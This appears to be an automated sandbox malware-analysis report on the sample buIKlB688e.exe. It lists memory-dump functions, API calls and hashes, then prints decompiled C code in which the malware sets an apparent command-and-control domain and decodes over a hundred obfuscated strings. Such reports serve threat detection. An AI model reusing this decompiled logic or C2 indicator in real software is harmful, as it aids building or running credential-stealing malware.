Source File: 00000000.00000002.370426850.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: false

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 0fababbc7cb1b6cf2bf76a0d9cf24d2333b58b0da42204b9b60ab5a765f035ab
Instruction ID: 313bddd3cda85ca6f4eb92e7f9213e75b5fdfcd5c548a94aae7fa643626f881f
Opcode Fuzzy Hash: 0fababbc7cb1b6cf2bf76a0d9cf24d2333b58b0da42204b9b60ab5a765f035ab
Instruction Fuzzy Hash: 13411270D10619CBDB24CFA9C8847CEBBB5FF49308F208569D419AB251DBB5698ACF90

Uniqueness

Uniqueness Score: -1.00%

Function 0120B8B8, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0120B93F

Memory Dump Source

Source File: 00000000.00000002.370426850.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: e95866b8e3378dd376847894fa21be3c80f9bb5c3208d5220ae5f6e8e4daa630
Instruction ID: 015684102b0ecade8f0328a660fa30e29062162bba16f249494548ca87b2d364
Opcode Fuzzy Hash: e95866b8e3378dd376847894fa21be3c80f9bb5c3208d5220ae5f6e8e4daa630
Instruction Fuzzy Hash: 3021E2B59002099FDB10CFA9D984ADEBFF8EB48324F14841AE914A3350D374A954CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 01209478, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,01209951,00000800,00000000,00000000), ref: 01209B62

Memory Dump Source

Source File: 00000000.00000002.370426850.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 96e3c5c40880bc684db538a7fe35c78ffef06c945b22e2c8267dceaafa4f6f3c
Instruction ID: 3fd369d7865069054ae4ccb9f2858333e39fe8b113d214906c7747305ba510e6
Opcode Fuzzy Hash: 96e3c5c40880bc684db538a7fe35c78ffef06c945b22e2c8267dceaafa4f6f3c
Instruction Fuzzy Hash: E31117B69007098FDF10CF9AC444BDEFBF4EB49324F14852AD51AA7241C3B4A585CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 01209870, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 012098D6

Memory Dump Source

Source File: 00000000.00000002.370426850.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 960966d71008556120d3afc741c297750c55fef085be89e1df19239c252a604f
Instruction ID: 75a9d74be8fbf2d7067cee4f74fd656cf19ba0320b6ed27470e7de661b2165a1
Opcode Fuzzy Hash: 960966d71008556120d3afc741c297750c55fef085be89e1df19239c252a604f
Instruction Fuzzy Hash: EA11F0B5C006098BDB10CF9AD444ADEFBF8AB49224F14852AD929A7201C374A685CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0120FF40, Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 0120FF9D

Memory Dump Source

Source File: 00000000.00000002.370426850.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 2be2e4e4ab1b6ccc4215520daaaee994975ddaa1492ac2338db227c666e7f90a
Instruction ID: 63122167be444a2ffb90b9f9d58014efb267649fb09777e345652b5551d5a4c9
Opcode Fuzzy Hash: 2be2e4e4ab1b6ccc4215520daaaee994975ddaa1492ac2338db227c666e7f90a
Instruction Fuzzy Hash: D31123B58002098FDB20CF99D588BDEFBF8EB49324F10851AE919B3340C374A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00A34351, Relevance: 3.5, Instructions: 3469COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.369491173.0000000000A32000.00000002.00020000.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.369480110.0000000000A30000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8909cfc6ec0ed6bc0a90e5927acccc3b77df94e5fd2d9fbf60e26af052d96f60
Instruction ID: 9bfccbf96be2f1184519353529a838c61f030f1bf92b679be84ebc40acc2a2c4
Opcode Fuzzy Hash: 8909cfc6ec0ed6bc0a90e5927acccc3b77df94e5fd2d9fbf60e26af052d96f60
Instruction Fuzzy Hash: 27530E6144F7C15FC7138BB85CB16E27FB1AE5721471E45C7E4C08F0A3E2286AAAD762

Uniqueness

Uniqueness Score: -1.00%

Function 0120E570, Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.370426850.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 457332c62067d753dba94837ef6ca1ac42b9d9d318d30be9cf38130ac2a0a550
Instruction ID: 8cf2d1ade16300fc13eb78ab92d7764aa97e549e86b2e13b9ede26e2fecad8b7
Opcode Fuzzy Hash: 457332c62067d753dba94837ef6ca1ac42b9d9d318d30be9cf38130ac2a0a550
Instruction Fuzzy Hash: 9A12B3F1811746CAE330EF65F99C19BBBA1F745328B904328D2652BADDD7B8114ACF84

Uniqueness

Uniqueness Score: -1.00%

Function 0120C124, Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.370426850.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ca39e71e47d4ddd295173504dc665dc095ae0121d7b12f7d9d993171ef33a08
Instruction ID: 2b6387ce23e571a989693e426a876502d970c1765a890d4658c3e70f14decbb7
Opcode Fuzzy Hash: 0ca39e71e47d4ddd295173504dc665dc095ae0121d7b12f7d9d993171ef33a08
Instruction Fuzzy Hash: 39A18232E1021A8FCF16DFF5C8445DEBBB2FF85300B15866AE905BB2A1DB71A955CB40

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: buIKlB688e.exe PID: 5364 Parent PID: 7132 buIKlB688e.exeCOMMON

Executed Functions

Function 00423050, Relevance: 510.4, Strings: 407, Instructions: 1630
COMMON

Download Yara Rule

C-Code - Quality: 99%

			E00423050(intOrPtr __ecx) {
				intOrPtr _v8;
				intOrPtr _t2;
				intOrPtr _t38;
				intOrPtr _t65;
				intOrPtr _t173;
				intOrPtr _t218;
				intOrPtr _t233;
				intOrPtr _t362;
				intOrPtr _t393;
				intOrPtr _t405;
				void* _t406;
				void* _t408;
				void* _t409;
				void* _t815;

				_push(__ecx);
				_v8 = __ecx;
				 *0x432354 = "056139954853430408";
				_push("chrisproperties.xyz");
				_pop(_t2);
				 *0x4326d8 = _t2;
				 *0x4321d0 = E00422F70(_t406, _t408, _t409, _t815, "LQ==");
				 *0x432608 = E00422F70(_t406, _t408, _t409, _t815, "KaoQpEzKSjGm8Q==");
				 *0x432600 = E00422F70(_t406, _t408, _t409, _t815, "CaoQpEzKRGjzqA7oxsEfmfrFl/2dONghOeYatRN8r22RvgdoQSz2oEl19dbLETI+8RVlqBE+g42Kng==");
				 *0x43236c = E00422F70(_t406, _t408, _t409, _t815, "DboNtEbQF3/+oFA=");
				 *0x432494 = E00422F70(_t406, _t408, _t409, _t815, "GLoX6gmCFw==");
				 *0x432694 = E00422F70(_t406, _t408, _t409, _t815, "D6AGohOHQTY=");
				 *0x432550 = E00422F70(_t406, _t408, _t409, _t815, "GbwOoFzTATf+y0KojtYSkaQ=");
				 *0x43214c = E00422F70(_t406, _t408, _t409, _t815, "CaoQpEzKRAm/60SwiotXjvfNyQ==");
				 *0x43248c = E00422F70(_t406, _t408, _t409, _t815, "F7JjuEDJAWWXwRnlzp8=");
				 *0x4321f8 = E00422F70(_t406, _t408, _t409, _t815, "HYYqlBOHQTY=");
				 *0x43242c = E00422F70(_t406, _t408, _t409, _t815, "HrwOsUDJRAu/6Eb/y8lB");
				 *0x432508 = E00422F70(_t406, _t408, _t409, _t815, "DbwRu07VCzCuvwPgmA==");
				 *0x4320a4 = E00422F70(_t406, _t408, _t409, _t815, "EbYaskbGFiH+yUKrjJlT07KbgPCVZg==");
				 *0x432564 = E00422F70(_t406, _t408, _t409, _t815, "ErIRtF7GFiD+qA7oxsEfmfrFl/2dONghOeYatRN8r22RvgdoQSz2oEl19dbLETI+8RVlqBE+g42Kng==");
				 *0x4325c8 = E00422F70(_t406, _t408, _t409, _t815, "CqEMs0zUFyqsvwPgmA==");
				 *0x432558 = E00422F70(_t406, _t408, _t409, _t815, "FrwEuUrGCGWu90ymjp9B26WbgPCVcQ==");
				 *0x43258c = E00422F70(_t406, _t408, _t409, _t815, "DLoHtUbEBTe6vwPgmA==");
				 *0x432104 = E00422F70(_t406, _t408, _t409, _t815, "HroQoEXGHX/+oFA=");
				 *0x4321cc = E00422F70(_t406, _t408, _t409, _t815, "CJIu6gmCFw==");
				 *0x43215c = E00422F70(_t406, _t408, _t409, _t815, "FrITpEbXXmX79g==");
				 *0x43228c = E00422F70(_t406, _t408, _t409, _t815, "DroOtQmKSWjzqA7oxsEfmfrFl/2dONghOeYatRN8r22RvgdoQSz2oEl19dbLETI+8RVlqBE+g42Kng==");
				 *0x432374 = E00422F70(_t406, _t408, _t409, _t815, "FrxjsUWdRGCt");
				 *0x432310 = E00422F70(_t406, _t408, _t409, _t815, "WrwNtROHQTY=");
				 *0x432348 = E00422F70(_t406, _t408, _t409, _t815, "FLYXp0bVD2XzqA7oxsEfmfrFl/2dONghOeYatRN8r22RvgdoQSz2oEl19dbLETI+8RVlqBE+g42Kng==");
				 *0x432198 = E00422F70(_t406, _t408, _t409, _t815, "E4NZ8GD3Ww==");
				 *0x432538 = E00422F70(_t406, _t408, _t409, _t815, "GbwWvl3VHX/+xkywhZhAzeg=");
				 *0x4320d8 = E00422F70(_t406, _t408, _t409, _t815, "E70QpEjLCCC6pXCqjZhFxraa3/CdONghOeYatRN8r22RvgdoQSz2oEl19dbLETI+8RVlqBE+g42Kng==");
				 *0x4323a0 = E00422F70(_t406, _t408, _t409, _t815, "f6A/jAM=");
				 *0x4320a0 = E00422F70(_t406, _t408, _t409, _t815, "dA==");
				 *0x4322bc = E00422F70(_t406, _t408, _t409, _t815, "f6A/jAzU");
				 *0x432170 = E00422F70(_t406, _t408, _t409, _t815, "f6A=");
				 *0x432570 = E00422F70(_t406, _t408, _t409, _t815, "Gek/jHnVCyKs5E6BiphT6Is=");
				 *0x432404 = E00422F70(_t406, _t408, _t409, _t815, "dLYbtQ==");
				 *0x432254 = E00422F70(_t406, _t408, _t409, _t815, "YIkMvkyJLSG761esjYVXxg==");
				 *0x4326b8 = E00422F70(_t406, _t408, _t409, _t815, "AYkMvkzzFiSw9kWgmbES7riG35nUKMc=");
				_t38 = E00422F70(_t406, _t408, _t409, _t815, "f6BM4QfNFCI="); // executed
				 *0x432244 = _t38;
				 *0x432520 = E00422F70(_t406, _t408, _t409, _t815, "f6BM4gfNFCI=");
				 *0x43252c = E00422F70(_t406, _t408, _t409, _t815, "f6BM4wfNFCI=");
				 *0x4326e4 = E00422F70(_t406, _t408, _t409, _t815, "f6BM5AfNFCI=");
				 *0x43259c = E00422F70(_t406, _t408, _t409, _t815, "f6BM5QfNFCI=");
				 *0x43256c = E00422F70(_t406, _t408, _t409, _t815, "f6BM5gfNFCI=");
				 *0x432294 = E00422F70(_t406, _t408, _t409, _t815, "f6BM5wfNFCI=");
				 *0x432568 = E00422F70(_t406, _t408, _t409, _t815, "Gek/jHnVCyKs5E6BiphT6Iuby7zZYZA/Oq9b9A==");
				 *0x4322f0 = E00422F70(_t406, _t408, _t409, _t815, "Gek/jHnVCyKs5E6BiphT6IuOyLXVd5k/Oq9b9A==");
				 *0x432398 = E00422F70(_t406, _t408, _t409, _t815, "Gek/jHnVCyKs5E6BiphT6IuF1arXeYBpOq9b9A==");
				 *0x432458 = E00422F70(_t406, _t408, _t409, _t815, "Gek/jHnVCyKs5E6BiphT6IuFyabTZcQ4JOVT9FI=");
				 *0x432440 = E00422F70(_t406, _t408, _t409, _t815, "Gek/jHnVCyKs5E6BiphT6IuGyaODO5FgeA==");
				 *0x432618 = E00422F70(_t406, _t408, _t409, _t815, "Gek/jHnVCyKs5E6BiphT6Iub1bbEep5iJ+VT9FI=");
				 *0x4320f4 = E00422F70(_t406, _t408, _t409, _t815, "Gek/jHnVCyKs5E6BiphT6Iue2aLFe4Flea4GrA5/5izQ");
				 *0x4326f4 = E00422F70(_t406, _t408, _t409, _t815, "BfYQ/lPOFA==");
				 *0x4322e0 = E00422F70(_t406, _t408, _t409, _t815, "Bo9jv0bMDSCt");
				 *0x4322c4 = E00422F70(_t406, _t408, _t409, _t815, "Bo8CpV3IAiyy6Q==");
				 *0x4326a0 = E00422F70(_t406, _t408, _t409, _t815, "Bo9jsw==");
				 *0x4320e8 = E00422F70(_t406, _t408, _t409, _t815, "PLoPtQ==");
				 *0x4322e8 = E00422F70(_t406, _t408, _t409, _t815, "f6BMvUjOCmuu7VM=");
				 *0x43224c = E00422F70(_t406, _t408, _t409, _t815, "G4MzlGjzJQ==");
				 *0x4321c4 = E00422F70(_t406, _t408, _t409, _t815, "FpwgkWXmNBWaxHeE");
				 *0x4324ec = E00422F70(_t406, _t408, _t409, _t815, "D4Amgnn1KwOXyWY=");
				 *0x4326cc = E00422F70(_t406, _t408, _t409, _t815, "ELwLvm3IAQ==");
				 *0x4325d4 = E00422F70(_t406, _t408, _t409, _t815, "EpIv6X3v");
				 *0x4324bc = E00422F70(_t406, _t408, _t409, _t815, "KaIPuV3CV2u66U8=");
				 *0x43247c = E00422F70(_t406, _t408, _t409, _t815, "KaIPuV3CVxqx9Uar");
				_t65 = E00422F70(_t406, _t408, _t409, _t815, "KaIPuV3CVxqu90a1ip5X66Ha"); // executed
				 *0x432140 = _t65;
				 *0x432408 = E00422F70(_t406, _t408, _t409, _t815, "KaIPuV3CVxqt8Ua1");
				 *0x4323f0 = E00422F70(_t406, _t408, _t409, _t815, "KaIPuV3CVxq96k+whoJtwLKQzg==");
				 *0x43241c = E00422F70(_t406, _t408, _t409, _t815, "KaIPuV3CVxq47E2kh4VI0Q==");
				 *0x4325f4 = E00422F70(_t406, _t408, _t409, _t815, "KaIPuV3CVxq96Uy2jg==");
				 *0x43250c = E00422F70(_t406, _t408, _t409, _t815, "KaIPuV3CVxq96k+whoJt1q6c36M=");
				 *0x432650 = E00422F70(_t406, _t408, _t409, _t815, "KaIPuV3CVxq96k+whoJt1ruH2A==");
				 *0x4321f0 = E00422F70(_t406, _t408, _t409, _t815, "BvEMo3bEFjyu8X/n0ZdulrKG2aLJZYFpcJRc/UcNoHrgsQ==");
				 *0x4323bc = E00422F70(_t406, _t408, _t409, _t815, "BvEe");
				 *0x4320d4 = E00422F70(_t406, _t408, _t409, _t815, "CpI3mA==");
				 *0x432690 = E00422F70(_t406, _t408, _t409, _t815, "CpI3mBQ=");
				 *0x4322b8 = E00422F70(_t406, _t408, _t409, _t815, "FIAwj2DJDTE=");
				 *0x4325a8 = E00422F70(_t406, _t408, _t409, _t815, "FIAwj3rPETG66lSr");
				 *0x4321e4 = E00422F70(_t406, _t408, _t409, _t815, "CphS4XbgATGX61egmYJT2JyNw4PceoE=");
				 *0x432178 = E00422F70(_t406, _t408, _t409, _t815, "CphS4XbhFiC71k+qnw==");
				 *0x4326d4 = E00422F70(_t406, _t408, _t409, _t815, "CphS4XbmETG24E2xgo9TwLI=");
				 *0x432338 = E00422F70(_t406, _t408, _t409, _t815, "CphS4XrjNhqa4EC3kpxG");
				 *0x432504 = E00422F70(_t406, _t408, _t409, _t815, "LLIWvF3ECCzw4U+p");
				 *0x4322ec = E00422F70(_t406, _t408, _t409, _t815, "DLIWvF3oFCCw00Kwh5g=");
				 *0x4324a0 = E00422F70(_t406, _t408, _t409, _t815, "DLIWvF3kCCqt4HWknoBG");
				 *0x4324d4 = E00422F70(_t406, _t408, _t409, _t815, "DLIWvF3iCjCz4FGkn4l7wLKFyQ==");
				 *0x4323a8 = E00422F70(_t406, _t408, _t409, _t815, "DLIWvF3gATGX8Uao");
				 *0x4326ec = E00422F70(_t406, _t408, _t409, _t815, "DLIWvF3hFiC7");
				 *0x4325d0 = E00422F70(_t406, _t408, _t409, _t815, "KrIQo17IFiGtq1e9nw==");
				 *0x432188 = E00422F70(_t406, _t408, _t409, _t815, "O/g=");
				 *0x43264c = E00422F70(_t406, _t408, _t409, _t815, "KA==");
				 *0x4323c8 = E00422F70(_t406, _t408, _t409, _t815, "CoEslhOHMQuV");
				 *0x43239c = E00422F70(_t406, _t408, _t409, _t815, "CoEslhOHQTY=");
				 *0x4323b8 = E00422F70(_t406, _t408, _t409, _t815, "CZwlhBOHQTY=");
				 *0x432258 = E00422F70(_t406, _t408, _t409, _t815, "EpwwhBOHQTY=");
				 *0x4322b4 = E00422F70(_t406, _t408, _t409, _t815, "D4AmghOHQTY=");
				 *0x4321a4 = E00422F70(_t406, _t408, _t409, _t815, "CpIwgxOH");
				 *0x4326c4 = E00422F70(_t406, _t408, _t409, _t815, "CpIwgxOHQTY=");
				 *0x4324c4 = E00422F70(_t406, _t408, _t409, _t815, "f6A/jGTIHiyy6UKZt6pbxrKO1ajsSYV+e61e9FsirCnS+g==");
				 *0x4326f0 = E00422F70(_t406, _t408, _t409, _t815, "Bo8Pv07OCjbw71CqhQ==");
				 *0x4321b0 = E00422F70(_t406, _t408, _t409, _t815, "PLwRvXrSBii38XaXpw==");
				 *0x432394 = E00422F70(_t406, _t408, _t409, _t815, "L6AGokfGCSCY7Eapjw==");
				 *0x432548 = E00422F70(_t406, _t408, _t409, _t815, "P71jolDXECC60FCgmYJT2bI=");
				 *0x432544 = E00422F70(_t406, _t408, _t409, _t815, "P71jolDXECC61UK2mJtdxrM=");
				 *0x432664 = E00422F70(_t406, _t408, _t409, _t815, "PaYKtA==");
				 *0x432400 = E00422F70(_t406, _t408, _t409, _t815, "Bo8XtUTX");
				 *0x43220c = E00422F70(_t406, _t408, _t409, _t815, "ObwMu0DCFxmCoFCazp8cwK+c");
				 *0x4321f4 = E00422F70(_t406, _t408, _t409, _t815, "f6Bq9VquQTbXoFDMzp87kaThn6M=");
				 *0x432138 = E00422F70(_t406, _t408, _t409, _t815, "GZIxlBOHQTb+y2KIrtYSkaTI/pHkUM8sMbgYvU0=");
				 *0x4323e8 = E00422F70(_t406, _t408, _t409, _t815, "ObA/jAzUO2Ctq1e9nw==");
				 *0x4321a8 = E00422F70(_t406, _t408, _t409, _t815, "O6YXv0/OCCmC2Qa2tMlBmqOQzg==");
				 *0x4324f8 = E00422F70(_t406, _t408, _t409, _t815, "f6Bq9Vo=");
				 *0x432100 = E00422F70(_t406, _t408, _t409, _t815, "CZYvlWrzRC2x9lfpy4VB/KOcyp/eeYwgNLtW7FZ9oinPwE8mGXO+oUQ9oIuPTmY//FYp6Fk/jtbG33g/9AmyJJTtkm82k33qs3jfLl0=");
				 *0x432158 = E00422F70(_t406, _t408, _t409, _t815, "CZYvlWrzRCqs7ESshbNHxrvEmqXDcIdidaZSx0gw7jXZvwo1DXKo+gsqvKSQXXNmuRgO13NejszI1GQ0pw==");
				 *0x4323e4 = E00422F70(_t406, _t408, _t409, _t815, "CZYvlWrzRA2R1neaoKlrmPeByY/YYYF8e6Vb4RJx8iHI+wZlBXKE/gE7rYmDED87uUA47E523f/Sx2515X/QW+n9zylh/S+z6CeCcx5wd5JwYcnj8E1jIXAdaf+hK7Oz19EyNRysSNA0qIZ8vwm0ByNx118=");
				 *0x4320b8 = E00422F70(_t406, _t408, _t409, _t815, "CZYvlWrzRCu/6EaahIJt17aa3vyQcI18fblW7Fc+7B/R/EQxBC376BwosYmHSHZ8smcx4F1hgoDE0n8+iyGVBruojV8pon33pWPCLkpoAfATDIfh700raGEsaeyqP7Q=");
				 *0x432390 = E00422F70(_t406, _t408, _t409, _t815, "CZYvlWrzRCO34E+hhY1f0fvIzLHcYJAsUpl41R487Trj9UU3AWmy/hA3qoI=");
				 *0x4325f0 = E00422F70(_t406, _t408, _t409, _t815, "CZYvlWrzRCu/6Ebpy5pT2KKNmpbiWrgsdb5D91g47iw=");
				 *0x432534 = E00422F70(_t406, _t408, _t409, _t815, "DoE2lQ==");
				 *0x4321ec = E00422F70(_t406, _t408, _t409, _t815, "HJIvg2w=");
				 *0x432240 = E00422F70(_t406, _t408, _t409, _t815, "dP0/jFnVCyO36Ua2xYVc3Q==");
				 *0x4324d0 = E00422F70(_t406, _t408, _t409, _t815, "f6A/jAM=");
				 *0x432488 = E00422F70(_t406, _t408, _t409, _t815, "Bo8vv0rGCGWN8UKxjg==");
				 *0x4322d0 = E00422F70(_t406, _t408, _t409, _t815, "FrwEuUeHICSq5A==");
				 *0x4320e4 = E00422F70(_t406, _t408, _t409, _t815, "GbwMu0DCFw==");
				 *0x432154 = E00422F70(_t406, _t408, _t409, _t815, "DbYB8G3GECQ=");
				 *0x432474 = E00422F70(_t406, _t408, _t409, _t815, "ObwMu0DCF2ut9E+sn4k=");
				 *0x4322f4 = E00422F70(_t406, _t408, _t409, _t815, "NrwEuUfUSi+t6k0=");
				 *0x4320c8 = E00422F70(_t406, _t408, _t409, _t815, "PLwRvUHOFzGx91rrmJ1e3aON");
				 *0x432368 = E00422F70(_t406, _t408, _t409, _t815, "Bo8soEzVBWWN6kWxnI1A0Yu09aDVZ5QsR79W+lI03hw=");
				 *0x432370 = E00422F70(_t406, _t408, _t409, _t815, "FaMGokg=");
				 *0x4324f4 = E00422F70(_t406, _t408, _t409, _t815, "Bo8kv0bACCCC2WCtmYNf0Yu076PVZ9VIdb9W");
				 *0x4323f8 = E00422F70(_t406, _t408, _t409, _t815, "HbwMt0XCRAa290yojg==");
				 *0x4325e4 = E00422F70(_t406, _t408, _t409, _t815, "Bo8guFvICSyr6H+Zvp9Xxves26TR");
				 *0x432200 = E00422F70(_t406, _t408, _t409, _t815, "GbsRv0TOESg=");
				 *0x43253c = E00422F70(_t406, _t408, _t409, _t815, "Bo8ov0TCECSC2Xa2jp4S8Lac2w==");
				 *0x432288 = E00422F70(_t406, _t408, _t409, _t815, "EbwOtV3G");
				 *0x43246c = E00422F70(_t406, _t408, _t409, _t815, "Bo8ivUDACxmC0FCgmcx21aOJ");
				 *0x4324b8 = E00422F70(_t406, _t408, _t409, _t815, "G74Kt0Y=");
				 *0x432670 = E00422F70(_t406, _t408, _t409, _t815, "Bo83v1vEDBmC0FCgmcx21aOJ");
				 *0x4323fc = E00422F70(_t406, _t408, _t409, _t815, "DrwRs0E=");
				 *0x43230c = E00422F70(_t406, _t408, _t409, _t815, "Bo8sokvOEDCz2X+QmIlAlJOJzrE=");
				 *0x43254c = E00422F70(_t406, _t408, _t409, _t815, "FaEBuV3SCQ==");
				 *0x432684 = E00422F70(_t406, _t408, _t409, _t815, "Bo8gv0TIZCqC2We3iotd2ou076PVZ9VIdb9W");
				 *0x432640 = E00422F70(_t406, _t408, _t409, _t815, "GbwOv03IRAGs5ESqhQ==");
				 *0x432324 = E00422F70(_t406, _t408, _t409, _t815, "Bo8tuUrPFiqz4H+Zvp9Xxves26TR");
				 *0x432268 = E00422F70(_t406, _t408, _t409, _t815, "FLpjuFvICSA=");
				 *0x432350 = E00422F70(_t406, _t408, _t409, _t815, "Bo8usVHTDCqwsH+Zvp9XxqQ=");
				 *0x4323c4 = E00422F70(_t406, _t408, _t409, _t815, "F7IbpEHICnA=");
				 *0x4321bc = E00422F70(_t406, _t408, _t409, _t815, "Bo8woFzTCiy12X+QmIlAlJOJzrE=");
				 *0x4320b4 = E00422F70(_t406, _t408, _t409, _t815, "CaMWpEfODw==");
				 *0x4324dc = E00422F70(_t406, _t408, _t409, _t815, "Bo8moEDERBWs7FWkiJUS9qWHzaPVZ6lQQbhS6h4V4zTd");
				 *0x432598 = E00422F70(_t406, _t408, _t409, _t815, "H4Mh");
				 *0x432320 = E00422F70(_t406, _t408, _t409, _t815, "Bo81uV/GCCG32X+QmIlAlJOJzrE=");
				 *0x432410 = E00422F70(_t406, _t408, _t409, _t815, "DLoVsUXDDQ==");
				 *0x43231c = E00422F70(_t406, _t408, _t409, _t815, "Bo8gv0rkCyaC2WG3hJtB0aW05oXDcIcsUKpD+Q==");
				 *0x4320fc = E00422F70(_t406, _t408, _t409, _t815, "Gbxjk0bERAes6lS2jp4=");
				 *0x43223c = E00422F70(_t406, _t408, _t409, _t815, "Bo8Wk0bdKSC67EKZt7lA1bm05oXDcIcsUKpD+Q==");
				 *0x43240c = E00422F70(_t406, _t408, _t409, _t815, "D6ECvgnlFiqp9ka3");
				 *0x43235c = E00422F70(_t406, _t408, _t409, _t815, "Bo8ymXmHNzCs43+Zvp9Xxves26TR");
				 *0x4324d8 = E00422F70(_t406, _t408, _t409, _t815, "C5oz8HrSFiM=");
				 *0x4325b8 = E00422F70(_t406, _t408, _t409, _t815, "Bo8gtUfTJjex8lCgmbBu4aSNyPD0dIFt");
				 *0x432638 = E00422F70(_t406, _t408, _t409, _t815, "GbYNpA==");
				 *0x432358 = E00422F70(_t406, _t408, _t409, _t815, "Bo8mvEzKASuq9gOHmYNFx7Ka5ozlZpB+NI9W7F8=");
				 *0x432148 = E00422F70(_t406, _t408, _t409, _t815, "H78GvUzJEDb+x1GqnJ9Xxg==");
				 *0x43260c = E00422F70(_t406, _t408, _t409, _t815, "Bo83v1vlFiqC2XO3hIpb2LI=");
				 *0x432660 = E00422F70(_t406, _t408, _t409, _t815, "DrwRklvI");
				 *0x432128 = E00422F70(_t406, _t408, _t409, _t815, "Bo8golDXECqK5EHlqZ5dw6SNyIzsQIZpZutz+Uow");
				 *0x432168 = E00422F70(_t406, _t408, _t409, _t815, "GaEaoF3IMCS8");
				 *0x4326e0 = E00422F70(_t406, _t408, _t409, _t815, "Bo8hokjRARax41eyip5X6IuqyLHGcNhOZqRA61sj3hzp4E83TEW6+QU=");
				 *0x4323d0 = E00422F70(_t406, _t408, _t409, _t815, "GKECpkw=");
				 *0x432260 = E00422F70(_t406, _t408, _t409, _t815, "Bo8uv1POCCm/2X+Dgp5X0riQ5ozgZ5pqfadS62IN");
				 *0x432334 = E00422F70(_t406, _t408, _t409, _t815, "F7wZuUXLBWWY7FGgjYNK");
				_t173 = E00422F70(_t406, _t408, _t409, _t815, "Bo8uv0bJBy236Uflu55d0KKLzrnfe4ZQSJtW9Ftxzy/T/XYZPHO06w00vYi6YA=="); // executed
				 *0x43251c = _t173;
				 *0x4320b0 = E00422F70(_t406, _t408, _t409, _t815, "CrIPtQnqCyqw");
				 *0x432444 = E00422F70(_t406, _t408, _t409, _t815, "Bo80sV3CFiOx/X+Zu55d0r6E36PsSQ==");
				 *0x4323b4 = E00422F70(_t406, _t408, _t409, _t815, "DbIXtVvBCz0=");
				 *0x432284 = E00422F70(_t406, _t408, _t409, _t815, "Bo9boEzEHDaq8EeshJ9u6JSR2LXCc5p0SJdn6lE36yzZ4HYZ");
				 *0x4322a8 = E00422F70(_t406, _t408, _t409, _t815, "GaoBtVvBCz0=");
				 *0x4321c0 = E00422F70(_t406, _t408, _t409, _t815, "Bo8tlX3gJRGbpXegiIRc27uH3bnVZqlQVqdW+1UZ4zfXz3YVHm695Ag9q6e6");
				 *0x432514 = E00422F70(_t406, _t408, _t409, _t815, "GL8Cs0LvBTK1");
				 *0x432434 = E00422F70(_t406, _t408, _t409, _t815, "Bo8uv1POCCm/2X+siIlR1aO05oDCepNleK5ExGI=");
				 *0x4320f0 = E00422F70(_t406, _t408, _t409, _t815, "E7AGk0jT");
				 *0x432228 = E00422F70(_t406, _t408, _t409, _t815, "Bo8o/WTCCCCx63+Z");
				 *0x432208 = E00422F70(_t406, _t408, _t409, _t815, "EZ4GvEzICg==");
				 *0x4323b0 = E00422F70(_t406, _t408, _t409, _t815, "Bo83uFzJZCCs50q3j7Bu5KWH3LnccIZQSA==");
				 *0x432248 = E00422F70(_t406, _t408, _t409, _t815, "DrsWvk3CFie390c=");
				 *0x4321e0 = E00422F70(_t406, _t408, _t409, _t815, "EpIxlH7mNkWC2WeAuK9g/Ye885/+SalfbbhD/VMN3gPZ/V43DW2L/ws7vYiVU21PgAg=");
				 *0x432574 = E00422F70(_t406, _t408, _t409, _t815, "CqEMs0zUFyqsy0Kojr9Gxr6G3Q==");
				 *0x43243c = E00422F70(_t406, _t408, _t409, _t815, "MbYRvkzLV3fw4U+p");
				 *0x4321d4 = E00422F70(_t406, _t408, _t409, _t815, "f7dDnWs=");
				 *0x4322d4 = E00422F70(_t406, _t408, _t409, _t815, "D70I");
				 *0x4323d8 = E00422F70(_t406, _t408, _t409, _t815, "CZwlhH7mNkWC2W6siJ5dx7iOzozsQpxicKRA6x4f1hzg0F83HmS1+TI9qoiPU3E=");
				 *0x432480 = E00422F70(_t406, _t408, _t409, _t815, "CqEMtFzEEAu/6EY=");
				 *0x432164 = E00422F70(_t406, _t408, _t409, _t815, "IuVX");
				 *0x432120 = E00422F70(_t406, _t408, _t409, _t815, "IutV");
				 *0x432594 = E00422F70(_t406, _t408, _t409, _t815, "CZwlhH7mNkWC2W6siJ5dx7iOzozsVod1ZL9Y/0ww8ijF");
				 *0x432224 = E00422F70(_t406, _t408, _t409, _t815, "F7JjuEDJAQKr7Ec=");
				 *0x432220 = E00422F70(_t406, _t408, _t409, _t815, "f7dM9U2IQSH+oEf/zogIkbM=");
